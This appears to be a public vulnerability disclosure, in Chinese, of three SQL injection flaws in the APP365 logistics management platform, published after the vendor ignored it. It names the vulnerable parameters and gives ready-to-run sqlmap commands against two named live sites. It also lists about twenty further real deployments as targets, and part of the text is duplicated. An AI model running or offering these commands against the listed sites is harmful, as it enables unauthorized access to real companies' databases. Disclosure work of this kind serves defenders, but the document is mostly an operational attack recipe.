2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开
RT
APP365在线物流管理平台3处SQL注入打包官网:http://www.app365.com/客户案例:http://www.app365.com/common/customer.jhtml百度搜索:友情链接: APP365 在线物流软件
第一处:注入链接: /Station/province.jspx?province_id=注入参数: province_id第二处:注入链接: /Station/stationList.jspx?city_name=注入参数: city_name第三处:注入链接: /LmsOrder/trackOrder.jspx?order_no=注入参数: order_no
测试案例:0x01(1)http://awind.app365.com/ sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db (2)http://www.56yt.com/ sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db 0x02(1)http://awind.app365.com/sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db (2)http://www.56yt.com/sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db 0x03(1)http://awind.app365.com/sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db (2)http://www.56yt.com/sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db 其他案例:http://www.szjdt56.cn/http://www.meiluen.com.cn/http://www.hal.net.cn/http://awind.app365.com/http://www.hacc56.com/http://www.gexll.com/http://www.szjdt56.cn/http://www.hacc56.com/http://www.wistron.cc/http://www.sxts.cn/http://www.sinojt.com/http://www.56yt.com/http://www.shdushi56.com/http://10086.app365.com/http://ezshop.app365.com/http://jdwl.wuy56.com/http://bfyd56.joyogy.com/http://jxwy56.joyogy.com/http://mqzt56.app365.com/http://www.gexll.com/http://www.bjjbwl.cn/http://www.xbwl.joyogy.com/http://krd56.joyogy.com/
sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
(2)http://www.56yt.com/
sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/Station/province.jspx?province_id=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
0x02(1)http://awind.app365.com/sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
(2)http://www.56yt.com/sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/Station/stationList.jspx?city_name=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
0x03(1)http://awind.app365.com/sqlmap注入:python sqlmap.py -u http://awind.app365.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
(2)http://www.56yt.com/sqlmap注入:python sqlmap.py -u http://www.56yt.com/site56/LmsOrder/trackOrder.jspx?order_no=340000000000000 --level 5 --risk 3 --batch -v 3 --technique=E --current-db
其他案例:http://www.szjdt56.cn/http://www.meiluen.com.cn/http://www.hal.net.cn/http://awind.app365.com/http://www.hacc56.com/http://www.gexll.com/http://www.szjdt56.cn/http://www.hacc56.com/http://www.wistron.cc/http://www.sxts.cn/http://www.sinojt.com/http://www.56yt.com/http://www.shdushi56.com/http://10086.app365.com/http://ezshop.app365.com/http://jdwl.wuy56.com/http://bfyd56.joyogy.com/http://jxwy56.joyogy.com/http://mqzt56.app365.com/http://www.gexll.com/http://www.bjjbwl.cn/http://www.xbwl.joyogy.com/http://krd56.joyogy.com/
未能联系到厂商或者厂商积极拒绝
